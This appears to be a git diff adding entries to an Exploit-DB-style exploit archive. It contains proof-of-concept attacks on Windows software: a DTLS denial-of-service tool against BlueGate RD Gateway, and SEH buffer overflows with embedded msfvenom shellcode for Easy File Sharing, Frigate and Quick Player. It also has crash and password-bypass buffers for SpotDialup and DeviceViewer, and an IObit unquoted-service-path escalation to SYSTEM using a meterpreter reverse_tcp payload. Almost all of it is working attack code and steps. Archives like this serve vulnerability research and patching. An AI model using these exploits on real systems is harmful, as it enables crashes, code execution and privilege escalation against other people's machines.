4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.SpotDialup Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

135
exploits/windows/dos/47963.cpp Normal file
View file

@ -0,0 +1,135 @@
#include "BlueGate.h"
/*
EDB Note:
- Download (Source) ~
- Download (Binary) ~
*/
void error(const char* msg)
{
printf("ERROR: %s\n", msg);
exit(EXIT_FAILURE);
}
void SOCKInit()
{
WSADATA wsaData;
int res;
res = WSAStartup(MAKEWORD(2, 2), &wsaData);
if (res != 0)
error("WSAStartup failed");
}
void DTLSInit()
{
SSL_library_init();
SSL_load_error_strings();
ERR_load_BIO_strings();
OpenSSL_add_all_algorithms();
}
int OpenUDPConnection(const char* hostname, int port)
{
int sockfd;
sockaddr_in addr;
sockfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sockfd < 0)
error("Failed to open socket");
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
inet_pton(AF_INET, hostname, &(addr.sin_addr));
if (connect(sockfd, (struct sockaddr*) & addr, sizeof(addr)) != 0)
{
closesocket(sockfd);
error("Failed to connect socket");
}
return sockfd;
}
SSL* DTLSConnection(const char* hostname)
{
int sockfd;
int result;
DTLSParams client;
sockfd = OpenUDPConnection(hostname, 3391);
client.ctx = SSL_CTX_new(DTLS_client_method());
client.bio = BIO_new_ssl_connect(client.ctx);
BIO_set_conn_hostname(client.bio, hostname);
BIO_get_ssl(client.bio, &(client.ssl));
SSL_set_connect_state(client.ssl);
SSL_set_mode(client.ssl, SSL_MODE_AUTO_RETRY);
SSL_set_fd(client.ssl, sockfd);
if (SSL_connect(client.ssl) != 1) {
return NULL;
}
return client.ssl;
}
int send_dos_packet(SSL* ssl, int id) {
CONNECT_PKT_FRAGMENT packet;
packet.hdr.pktID = PKT_TYPE_CONNECT_REQ_FRAGMENT;
packet.hdr.pktLen = sizeof(CONNECT_PKT_FRAGMENT) - sizeof(UDP_PACKET_HEADER);
packet.usFragmentID = id;
packet.usNoOfFragments = id;
packet.cbFragmentLength = 1000;
memset(packet.fragment, 0x41, 1000);
char pkt[sizeof(packet)];
memcpy(&pkt, &packet, sizeof(packet));
return SSL_write(ssl, pkt, sizeof(pkt));
}
int main(int argc, char* argv[])
{
SSL* ssl;
int i = 0;
char* hostname;
if (argc != 2) {
printf("Usage: %s <IP address>\n", argv[0]);
return 0;
}
hostname = argv[1];
SOCKInit();
DTLSInit();
while (i++ > -1) {
ssl = DTLSConnection(hostname);
if (ssl == NULL) {
break;
}
for (int n = 0; n < 4; n++) {
send_dos_packet(ssl, i+n);
printf("Sending packet [%u]\n", i + n);
}
i++;
}
return 0;
}

87
exploits/windows/local/47411.py Executable file
View file

@ -0,0 +1,87 @@
#!/usr/bin/python
# Exploit Title: Easy File Sharing Web Server 7.2 local SEH overflow
# Date: 9/23/2019
# Exploit Author: x00pwn
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2
# Tested on: Windows 7
# Exploit summary: When adding a new user to the application, you can exploit a local SEH buffer overflow
# by creating a malicious username, this exploit POC will create a malicious text file
# with the contents to execute arbitrary code.
# Author : Nu11pwn
badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
# found bad chars - "\x00\x0a\x0d"
shellcode = ""
shellcode += "\xbb\xc4\x1c\xb2\xd3\xdd\xc2\xd9\x74\x24\xf4\x5e"
shellcode += "\x2b\xc9\xb1\x31\x31\x5e\x13\x83\xc6\x04\x03\x5e"
shellcode += "\xcb\xfe\x47\x2f\x3b\x7c\xa7\xd0\xbb\xe1\x21\x35"
shellcode += "\x8a\x21\x55\x3d\xbc\x91\x1d\x13\x30\x59\x73\x80"
shellcode += "\xc3\x2f\x5c\xa7\x64\x85\xba\x86\x75\xb6\xff\x89"
shellcode += "\xf5\xc5\xd3\x69\xc4\x05\x26\x6b\x01\x7b\xcb\x39"
shellcode += "\xda\xf7\x7e\xae\x6f\x4d\x43\x45\x23\x43\xc3\xba"
shellcode += "\xf3\x62\xe2\x6c\x88\x3c\x24\x8e\x5d\x35\x6d\x88"
shellcode += "\x82\x70\x27\x23\x70\x0e\xb6\xe5\x49\xef\x15\xc8"
shellcode += "\x66\x02\x67\x0c\x40\xfd\x12\x64\xb3\x80\x24\xb3"
shellcode += "\xce\x5e\xa0\x20\x68\x14\x12\x8d\x89\xf9\xc5\x46"
shellcode += "\x85\xb6\x82\x01\x89\x49\x46\x3a\xb5\xc2\x69\xed"
shellcode += "\x3c\x90\x4d\x29\x65\x42\xef\x68\xc3\x25\x10\x6a"
shellcode += "\xac\x9a\xb4\xe0\x40\xce\xc4\xaa\x0e\x11\x5a\xd1"
shellcode += "\x7c\x11\x64\xda\xd0\x7a\x55\x51\xbf\xfd\x6a\xb0"
shellcode += "\x84\xfc\x9b\x09\x10\x68\x02\xf8\x59\xf4\xb5\xd6"
shellcode += "\x9d\x01\x36\xd3\x5d\xf6\x26\x96\x58\xb2\xe0\x4a"
shellcode += "\x10\xab\x84\x6c\x87\xcc\x8c\x0e\x46\x5f\x4c\xff"
shellcode += "\xed\xe7\xf7\xff"
# Log data, item 69
# Address=0BADF00D
# Message= 0x10000000 | 0x10050000 | 0x00050000 | False | False | False | False | False | -1.0- [ImageLoad.dll] (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll)
# Log data, item 24
# Address=100195F2
# Message= 0x100195f2 : pop esi # pop ecx # ret | {PAGE_EXECUTE_READ} [ImageLoad.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll)
nseh = "\xEB\x06\x90\x90"
seh = "\xF2\x95\x01\x10"
payload = "A" * 4059
payload += nseh
payload += seh
payload += "\x90" * 16
payload += shellcode
payload += "D" *4000
# SEH chain of main thread, item 1
# Address=46336646
# SE handler=*** CORRUPT ENTRY ***
# Log data, item 34
# Address=0BADF00D
# Message= SEH record (nseh field) at 0x0018a938 overwritten with normal pattern : 0x46336646 (offset 4059), followed by 933 bytes of cyclic data after the handler
# [*] Exact match at offset 4059
try:
evilCreate =open("exploit.txt","w")
print("""
Easy File Sharing web server SEH overflow
""")
print("[x] Creating malicious file")
evilCreate.write(payload)
evilCreate.close()
print("[x] Malicious file create")
print("[x] Go to user accounts and add a new user with malicious name")
print("[x] Watch the program crash")
except:
print("[!] File failed to be created")

33
exploits/windows/local/47476.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: DeviceViewer 3.12.0.1 - Arbitrary Password Change
# Date: 2019-09-10
# Exploit Author: Alessandro Magnosi
# Vendor Homepage: http://www.sricam.com/
# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
# Version: v3.12.0.1
# Tested on: Windows 7
#!/usr/bin/python
# Steps to reproduce:
# 1. Generate the payload executing the PoC
# 2. Login in the Sricam DeviceViewer application as any registered user
# 3. Go to System Tools -> Change Password
# 4. Set the old password as the malicious payload, and the new password as whatever you want
# 5. The password will be changed with the new one
# 6. To confirm, restart the application and try to login with the new password
payload = "A" * 5000
try:
bypass = open("bypass.txt","w")
print("### Sricam DeviceViewer 3.12.0.1 Change Password Security Bypass")
print("### Author: Alessandro Magnosi\n")
print("[*] Creating old password file")
bypass.write(payload)
bypass.close()
print("[+] Old password file created\n")
print("[i] When changing password, set the old password to the file contents")
print("[i] Close the program and reopen it")
print("[i] Log in with new password")
except:
print("[!] Error creating the file")

620
exploits/windows/local/47981.txt Normal file
View file

File diff suppressed because one or more lines are too long

53
exploits/windows/local/48543.txt Normal file
View file

@ -0,0 +1,53 @@
# Title: IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path
# Author: Gobinathan L
# Date: 2020-06-03
# Vendor Homepage: https://www.iobit.com
# Software Link: https://www.iobit.com/en/advanceduninstaller.php
# Version : 9.5.0.15
# Tested on: Windows 10 64bit(EN)
About Unquoted Service Path :
==============================
When a service is created whose executable path contains spaces and isn't enclosed within quotes,
leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges.
(only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).
Steps to recreate :
=============================
1. Open CMD and Check for USP vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
2. The Vulnerable Service would Show up.
3. Check the Service Permissions by typing [ sc qc IObitUnSvr ]
4. The command would return..
C:\>sc qc IObitUnSvr
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: IObitUnSvr
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : IObit Uninstaller Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
5. This concludes that the service is running as SYSTEM. "Highest privilege in a machine"
6. Now create a Payload with msfvenom or other tools and name it to IObit.exe
7. Make sure you have write Permissions to "C:\Program Files (x86)\IObit" directory.
8. Provided that you have right permissions, Drop the IObit.exe executable you created into the "C:\Program Files (x86)\IObit" Directory.
9. Now restart the IObit Uninstaller service by giving coommand [ sc stop IObitUnSvr ] followed by [ sc start IObitUnSvr ]
10. If your payload is created with msfvenom, quickly migrate to a different process. [Any process since you have the SYSTEM Privilege].
During my testing :
Payload : msfvenom -p windows/meterpreter/reverse_tcp -f exe -o IObit.exe
Migrate : meterpreter> run post/windows/manage/migrate [To migrate into a different Process ]
# Disclaimer :
=========================
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

70
exploits/windows/local/48563.py Executable file
View file

@ -0,0 +1,70 @@
# Exploit Title: Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC)
# Vendor Homepage: http://www.frigate3.com/
# Software Link Download: http://www.frigate3.com/download/frigate3_pro.exe
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-06-07
# Vulnerable Software: Frigate
# Version: <= 3.36.0.9
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
#Steps to Produce the Crash:
# 1.- Run python code: FrigateLCE.py
# 2.- Copy content to clipboard
# 3.- Turn off DEP for Frigate3.exe
# 4.- Open "Frigate3.exe"
# 5.- Go to "Command" > "Command Line" > "Activate Command Line"
# 6.- Paste ClipBoard into the "Command Line" field which appears at the bottom of the Frigate application.
# 7.- Press Enter from Keyboard.
# 7.- Click on OK in the dialog box that appears.
# 8.- Calc.exe runs.
#################################################################################################################################################
#Python "FrigateLCE.py" Code:
f= open("FrigateLCE.txt", "w")
junk="A" * 4112
nseh="\xeb\x20\x90\x90"
seh="\x4B\x0C\x01\x40"
#40010C4B 5B POP EBX
#40010C4C 5D POP EBP
#40010C4D C3 RETN
#POP EBX ,POP EBP, RETN | [rtl60.bpl] (C:\Program Files\Frigate3\rtl60.bpl)
nops="\x90" * 50
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d" -f python
buf = ""
buf += "\xbf\xe3\xfa\x7b\x97\xdb\xd5\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x30\x83\xed\xfc\x31\x7d\x0f\x03\x7d\xec\x18"
buf += "\x8e\x6b\x1a\x5e\x71\x94\xda\x3f\xfb\x71\xeb\x7f\x9f"
buf += "\xf2\x5b\xb0\xeb\x57\x57\x3b\xb9\x43\xec\x49\x16\x63"
buf += "\x45\xe7\x40\x4a\x56\x54\xb0\xcd\xd4\xa7\xe5\x2d\xe5"
buf += "\x67\xf8\x2c\x22\x95\xf1\x7d\xfb\xd1\xa4\x91\x88\xac"
buf += "\x74\x19\xc2\x21\xfd\xfe\x92\x40\x2c\x51\xa9\x1a\xee"
buf += "\x53\x7e\x17\xa7\x4b\x63\x12\x71\xe7\x57\xe8\x80\x21"
buf += "\xa6\x11\x2e\x0c\x07\xe0\x2e\x48\xaf\x1b\x45\xa0\xcc"
buf += "\xa6\x5e\x77\xaf\x7c\xea\x6c\x17\xf6\x4c\x49\xa6\xdb"
buf += "\x0b\x1a\xa4\x90\x58\x44\xa8\x27\x8c\xfe\xd4\xac\x33"
buf += "\xd1\x5d\xf6\x17\xf5\x06\xac\x36\xac\xe2\x03\x46\xae"
buf += "\x4d\xfb\xe2\xa4\x63\xe8\x9e\xe6\xe9\xef\x2d\x9d\x5f"
buf += "\xef\x2d\x9e\xcf\x98\x1c\x15\x80\xdf\xa0\xfc\xe5\x10"
buf += "\xeb\x5d\x4f\xb9\xb2\x37\xd2\xa4\x44\xe2\x10\xd1\xc6"
buf += "\x07\xe8\x26\xd6\x6d\xed\x63\x50\x9d\x9f\xfc\x35\xa1"
buf += "\x0c\xfc\x1f\xc2\xd3\x6e\xc3\x05"
payload = junk + nseh + seh + nops + buf
f.write(payload)
f.close

90
exploits/windows/local/48564.py Executable file
View file

@ -0,0 +1,90 @@
# Exploit Title: Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)
# Date: 2020-06-05
# Author: Felipe Winsnes
# Software Link: http://download.cnet.com/Quick-Player/3640-2168_4-10871418.html
# Version: 1.3
# Tested on: Windows 7
# Proof of Concept:
# 1.- Run the python script "poc.py", it will create a new file "poc.m3l"
# 2.- Open the application,
# 3.- Click on the bottom-right button with the letters "PL"
# 4.- Select the option "File"
# 5.- Click "Load List"
# 6.- Select poc.m3l
# 7.- Profit
# Blog where the vulnerability is discussed: https://whitecr0wz.github.io/posts/Exploiting-Quick-Player/
# Direct proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings6/18.gif
# msfvenom -p windows/messagebox TEXT=pwned! -e x86/unicode_mixed -f py EXITFUNC=thread BufferRegister=EAX
# Payload size: 640 bytes
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += b"\x47\x42\x39\x75\x34\x4a\x42\x37\x69\x5a\x4b\x73\x6b"
buf += b"\x59\x49\x71\x64\x6f\x34\x69\x64\x70\x31\x4a\x32\x47"
buf += b"\x42\x61\x67\x6e\x51\x35\x79\x43\x34\x64\x4b\x62\x51"
buf += b"\x4c\x70\x64\x4b\x70\x76\x5a\x6c\x64\x4b\x74\x36\x4d"
buf += b"\x4c\x44\x4b\x51\x36\x4b\x58\x64\x4b\x71\x6e\x6d\x50"
buf += b"\x64\x4b\x4d\x66\x4e\x58\x70\x4f\x6b\x68\x31\x65\x4a"
buf += b"\x53\x62\x39\x49\x71\x78\x51\x79\x6f\x58\x61\x53\x30"
buf += b"\x42\x6b\x52\x4c\x6b\x74\x4f\x34\x52\x6b\x50\x45\x6d"
buf += b"\x6c\x72\x6b\x6e\x74\x4c\x68\x33\x48\x69\x71\x4a\x4a"
buf += b"\x52\x6b\x70\x4a\x6a\x78\x32\x6b\x31\x4a\x4d\x50\x6a"
buf += b"\x61\x6a\x4b\x79\x53\x6e\x54\x4e\x69\x44\x4b\x6f\x44"
buf += b"\x54\x4b\x6d\x31\x5a\x4e\x6d\x61\x39\x6f\x4e\x51\x69"
buf += b"\x30\x49\x6c\x46\x4c\x45\x34\x45\x70\x52\x54\x7a\x67"
buf += b"\x35\x71\x66\x6f\x5a\x6d\x49\x71\x77\x57\x58\x6b\x59"
buf += b"\x64\x4d\x6b\x73\x4c\x4d\x54\x6d\x58\x32\x55\x59\x51"
buf += b"\x34\x4b\x4f\x6a\x4b\x74\x4d\x31\x6a\x4b\x71\x56\x62"
buf += b"\x6b\x7a\x6c\x70\x4b\x34\x4b\x6e\x7a\x6d\x4c\x6b\x51"
buf += b"\x48\x6b\x62\x6b\x5a\x64\x44\x4b\x59\x71\x5a\x48\x52"
buf += b"\x69\x71\x34\x6d\x54\x4b\x6c\x71\x51\x46\x63\x37\x42"
buf += b"\x4c\x48\x6c\x69\x38\x54\x62\x69\x58\x65\x52\x69\x79"
buf += b"\x32\x72\x48\x44\x4e\x6e\x6e\x4c\x4e\x78\x6c\x32\x32"
buf += b"\x5a\x48\x45\x4f\x49\x6f\x49\x6f\x4b\x4f\x53\x59\x71"
buf += b"\x35\x69\x74\x77\x4b\x7a\x4f\x68\x4e\x49\x50\x51\x50"
buf += b"\x64\x47\x4b\x6c\x6c\x64\x31\x42\x49\x58\x52\x6e\x59"
buf += b"\x6f\x39\x6f\x49\x6f\x62\x69\x71\x35\x7a\x68\x33\x38"
buf += b"\x30\x6c\x52\x4c\x6b\x70\x4e\x61\x71\x58\x4d\x63\x50"
buf += b"\x32\x4e\x4e\x4f\x74\x52\x48\x71\x65\x34\x33\x32\x45"
buf += b"\x31\x62\x4e\x50\x77\x6b\x62\x68\x71\x4c\x4e\x44\x4a"
buf += b"\x6a\x52\x69\x6b\x36\x6e\x76\x79\x6f\x4f\x65\x6a\x64"
buf += b"\x55\x39\x35\x72\x72\x30\x65\x6b\x56\x48\x77\x32\x6e"
buf += b"\x6d\x75\x6c\x74\x47\x6d\x4c\x4f\x34\x62\x32\x5a\x48"
buf += b"\x51\x4f\x4b\x4f\x49\x6f\x39\x6f\x73\x38\x70\x6f\x71"
buf += b"\x68\x31\x48\x4b\x70\x53\x38\x50\x61\x4f\x77\x43\x35"
buf += b"\x71\x32\x51\x58\x30\x4d\x30\x65\x72\x53\x53\x43\x6e"
buf += b"\x51\x57\x6b\x63\x58\x6f\x6c\x6b\x74\x6a\x6a\x45\x39"
buf += b"\x39\x53\x62\x48\x71\x54\x4d\x51\x6e\x78\x6d\x50\x61"
buf += b"\x58\x70\x70\x31\x67\x32\x4e\x51\x55\x4d\x61\x69\x39"
buf += b"\x72\x68\x6e\x6c\x6d\x54\x4b\x56\x33\x59\x48\x61\x4e"
buf += b"\x51\x49\x42\x4f\x62\x30\x53\x4e\x71\x51\x42\x79\x6f"
buf += b"\x38\x50\x6e\x51\x75\x70\x32\x30\x69\x6f\x32\x35\x4c"
buf += b"\x48\x41\x41"
alignment = "\x54\x71" # push esp, padding
alignment += "\x58\x71" # pop eax, padding
alignment += "\x05\x20\x22" # add eax, 0x22002000
alignment += "\x71" # Padding
alignment += "\x2D\x19\x22" # sub eax, 0x22001900
alignment += "\x71" # Padding
alignment += "\x50\x71" # push eax, padding
alignment += "\xC3" # retn
ret = "\x71\x41" + "\xF2\x41" # 0x004100f2 : pop esi # pop ebx # ret 0x04 | startnull,unicode {PAGE_EXECUTE_READWRITE} [Quick Player.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.3.0.0 (C:\Program Files\Quick Player\Quick Player.exe)
buffer = "A" * 536 + ret + "\x41\x71\x41\x71" + alignment + "A" * 73 + buf + "A" * 200
f = open ("poc.m3l", "w")
f.write(buffer)
f.close()

Some files were not shown because too many files have changed in this diff Show more